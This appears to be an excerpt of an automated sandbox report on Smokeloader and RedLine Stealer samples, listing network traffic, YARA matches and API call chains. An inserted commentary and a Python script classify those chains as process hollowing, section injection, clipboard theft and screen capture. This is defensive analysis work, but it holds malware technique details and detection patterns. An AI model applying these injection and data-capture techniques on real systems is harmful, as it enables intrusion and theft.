Source: kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_0042EAB0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 5_2_0042EC90
Source: Yara match File source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR

System Summary

Source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401615
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401658
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00403406 NtTerminateProcess,GetModuleHandleA, 0_2_00403406
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401620
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401524
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040162D
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401635
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401615
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401658
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00403406 NtTerminateProcess,GetModuleHandleA, 4_2_00403406
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401620
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401524
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_0040162D
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401635
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043B9B10 NtProtectVirtualMemory,NtProtectVirtualMemory, 8_2_043B9B10
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 8_2_043BA4F0
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043B9850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification, 8_2_043B9850
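The "Code function" entries above are the most useful part of this section for an analyst: the call chain at 8_2_043BA4F0 (CreateProcessA, NtUnmapViewOfSection, WriteProcessMemory, Wow64SetThreadContext, ResumeThread) is textbook process hollowing, the repeated NtCreateSection/NtMapViewOfSection pairs in 3.exe and rcjjrra are section-mapping injection, and the two A247.exe functions flagged under the capture heading read the clipboard and grab the screen through GDI. The script below is an added example, not part of the Joe Sandbox report or of any of the malware families it names: it parses these lines and classifies each function by matching ordered API subsequences against heuristic technique definitions I wrote. The sample input is copied verbatim from the report; treating the leading number of the function id (for example the 8 in 8_2_043BA4F0) as the process index is an assumption about the report format.

```python
import re
from collections import defaultdict

# Constructed sample input: "Code function" lines copied verbatim from the report above.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_0042EAB0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 5_2_0042EC90
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401615
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043B9B10 NtProtectVirtualMemory,NtProtectVirtualMemory, 8_2_043B9B10
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 8_2_043BA4F0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00427353 5_2_00427353
""".strip().splitlines()

# "Source: <image> Code function: <fid> <api,api,...,> <fid>"; the API list is
# absent for functions the sandbox could not resolve (last sample line).
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]+) "
    r"(?P<apis>(?:\w+,)*) ?(?P=fid)$"
)

# Heuristic technique definitions (mine, not Joe Sandbox signatures). Each is an
# ordered list of steps; a step is satisfied by any API name in its set, and
# unrelated calls may sit between steps.
TECHNIQUES = {
    "process_hollowing": [
        {"CreateProcessA", "CreateProcessW"},
        {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
        {"ResumeThread", "NtResumeThread"},
    ],
    # One section mapped twice: once locally to fill it, once into the target.
    "section_map_injection": [
        {"NtCreateSection", "ZwCreateSection"},
        {"NtMapViewOfSection", "ZwMapViewOfSection"},
        {"NtMapViewOfSection", "ZwMapViewOfSection"},
    ],
    "clipboard_read": [
        {"OpenClipboard"}, {"GetClipboardData"}, {"CloseClipboard"},
    ],
    "screen_capture": [
        {"GetDC", "GetWindowDC"}, {"CreateCompatibleDC"},
        {"CreateCompatibleBitmap"}, {"BitBlt", "StretchBlt"},
    ],
}


def parse_line(line):
    """Return {src, fid, proc, apis} for a Code function line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    apis = [a for a in m.group("apis").split(",") if a]
    proc_idx = int(m.group("fid").split("_")[0])  # assumed: process index
    return {"src": m.group("src"), "fid": m.group("fid"), "proc": proc_idx, "apis": apis}


def steps_in_order(apis, steps):
    """True if every step is hit, in order, somewhere in the call list."""
    i = 0
    for api in apis:
        if i < len(steps) and api in steps[i]:
            i += 1
    return i == len(steps)


def classify(apis):
    """Names of all techniques whose step sequence the call list satisfies."""
    return sorted(name for name, steps in TECHNIQUES.items() if steps_in_order(apis, steps))


def scan(lines):
    """{source image: {function id: [techniques]}} for functions with a hit."""
    hits = defaultdict(dict)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        found = classify(rec["apis"])
        if found:
            hits[rec["src"]][rec["fid"]] = found
    return dict(hits)


if __name__ == "__main__":
    for src, funcs in scan(SAMPLE_LINES).items():
        for fid, techs in funcs.items():
            print(f"{src}  {fid}  {', '.join(techs)}")
```

Ordered-subsequence matching rather than exact-sequence matching is deliberate: packers and loaders interleave allocation, protection and bookkeeping calls between the calls that matter, and the two WriteProcessMemory calls in the hollowing chain above (headers, then sections) would break a strict template. The same parser can be pointed at a whole report dump to pull out every function worth opening in a disassembler first.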
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00427353 5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004016E0 5_2_004016E0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00420880 5_2_00420880
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00404970 5_2_00404970
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0041FD10 5_2_0041FD10
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0043B050 5_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00426174 5_2_00426174
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004061F0 5_2_004061F0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00426284 5_2_00426284
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004223B8 5_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00405440 5_2_00405440
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0040F400 5_2_0040F400
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004164D2 5_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00433480 5_2_00433480
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00403570 5_2_00403570
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00421580 5_2_00421580
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004067B0 5_2_004067B0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_004089A0 5_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00424B80 5_2_00424B80
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00421C71 5_2_00421C71
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00425CEE 5_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00440D36 5_2_00440D36
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0043AD30 5_2_0043AD30
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00407DF0 5_2_00407DF0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00404EF0 5_2_00404EF0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00435EB0 5_2_00435EB0
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00632067 5_2_00632067
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00618057 5_2_00618057
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00615157 5_2_00615157
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00646117 5_2_00646117
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00611267 5_2_00611267
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0064B2B7 5_2_0064B2B7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006363DB 5_2_006363DB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00616457 5_2_00616457
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006364EB 5_2_006364EB
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006375BA 5_2_006375BA
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0061F667 5_2_0061F667
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006436E7 5_2_006436E7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006156A7 5_2_006156A7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00626739 5_2_00626739
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_006137D7 5_2_006137D7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00616A17 5_2_00616A17
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00630AE7 5_2_00630AE7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00614BD7 5_2_00614BD7
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00618C07 5_2_00618C07
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_00635F55 5_2_00635F55
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0064AF97 5_2_0064AF97
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BAB10 8_2_043BAB10
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC2ECC0 9_2_6CC2ECC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC8ECD0 9_2_6CC8ECD0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC3AC60 9_2_6CC3AC60
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCF6C00 9_2_6CCF6C00
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD0AC30 9_2_6CD0AC30
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CDBCDC0 9_2_6CDBCDC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC6D90 9_2_6CCC6D90
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC34DB0 9_2_6CC34DB0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD5AD50 9_2_6CD5AD50
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFED70 9_2_6CCFED70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CDB8D20 9_2_6CDB8D20
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC3AEC0 9_2_6CC3AEC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCD0EC0 9_2_6CCD0EC0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB6E90 9_2_6CCB6E90
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCCEE70 9_2_6CCCEE70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD10E20 9_2_6CD10E20
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD0EFF0 9_2_6CD0EFF0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC30FE0 9_2_6CC30FE0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD78FB0 9_2_6CD78FB0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC3EFB0 9_2_6CC3EFB0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9EF40 9_2_6CC9EF40
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCF2F70 9_2_6CCF2F70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC36F10 9_2_6CC36F10
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD70F20 9_2_6CD70F20
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD1C8C0 9_2_6CD1C8C0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD368E0 9_2_6CD368E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD04840 9_2_6CD04840
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC80820 9_2_6CC80820
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCBA820 9_2_6CCBA820
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD4C9E0 9_2_6CD4C9E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC649F0 9_2_6CC649F0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC09A0 9_2_6CCC09A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCEA9A0 9_2_6CCEA9A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCF09B0 9_2_6CCF09B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC68960 9_2_6CC68960
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC86900 9_2_6CC86900
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCAEA80 9_2_6CCAEA80
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCACA70 9_2_6CCACA70
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCDEA00 9_2_6CCDEA00
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCE8A30 9_2_6CCE8A30
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD36BE0 9_2_6CD36BE0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCD0BA0 9_2_6CCD0BA0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC764D0 9_2_6CC764D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCCA4D0 9_2_6CCCA4D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD5A480 9_2_6CD5A480
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC48460 9_2_6CC48460
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC94420 9_2_6CC94420
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCBA430 9_2_6CCBA430
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFA5E0 9_2_6CCFA5E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCBE5F0 9_2_6CCBE5F0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC245B0 9_2_6CC245B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD78550 9_2_6CD78550
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC88540 9_2_6CC88540
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD34540 9_2_6CD34540
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC92560 9_2_6CC92560
